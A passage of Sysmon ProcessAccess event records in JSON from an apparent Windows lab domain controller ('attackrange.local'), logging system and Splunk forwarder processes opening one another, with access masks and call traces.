C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1786,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001081850300}\r\nTargetProcessId: 4076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001081850300}","TargetProcessId":"4076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1787,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.647\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.647","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.648\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001054890300}\r\nTargetProcessId: 2780\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.648","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001054890300}","TargetProcessId":"2780","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.648\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001054890300}\r\nTargetProcessId: 2780\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.648","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001054890300}","TargetProcessId":"2780","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.661\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001054890300}\r\nTargetProcessId: 2780\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.661","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001054890300}","TargetProcessId":"2780","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.661\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 2420\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001054890300}\r\nTargetProcessId: 2780\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2dbe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+155e9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+fa1f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1351d|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+127f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+ced2|C:\\Windows\\system32\\wbem\\wbemcore.dll+d531|C:\\Windows\\system32\\wbem\\wbemcore.dll+104fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+25435|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+dc51|C:\\Windows\\system32\\wbem\\wbemcore.dll+2cfdf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.661","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","SourceProcessId":"1140","SourceThreadId":"2420","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001054890300}","TargetProcessId":"2780","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2dbe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+155e9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+fa1f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1351d|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+127f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+ced2|C:\\Windows\\system32\\wbem\\wbemcore.dll+d531|C:\\Windows\\system32\\wbem\\wbemcore.dll+104fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+25435|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+dc51|C:\\Windows\\system32\\wbem\\wbemcore.dll+2cfdf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.849\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001081850300}\r\nSourceProcessId: 4076\r\nSourceThreadId: 4080\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.849","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001081850300}","SourceProcessId":"4076","SourceThreadId":"4080","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001054890300}\r\nSourceProcessId: 2780\r\nSourceThreadId: 1604\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1040\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\System32\\combase.dll+4d01b|C:\\Windows\\System32\\combase.dll+9e002|C:\\Windows\\System32\\combase.dll+9e92e|C:\\Windows\\System32\\combase.dll+9e6ef|C:\\Windows\\System32\\combase.dll+3fff8|C:\\Windows\\System32\\combase.dll+3fc10|C:\\Windows\\System32\\combase.dll+4fa47|C:\\Windows\\System32\\combase.dll+c1ef4|C:\\Windows\\System32\\combase.dll+4ea07|C:\\Windows\\System32\\combase.dll+4a6d0|C:\\Windows\\System32\\combase.dll+3f5a|C:\\Windows\\System32\\RPCRT4.dll+dbd2a|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3f3|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 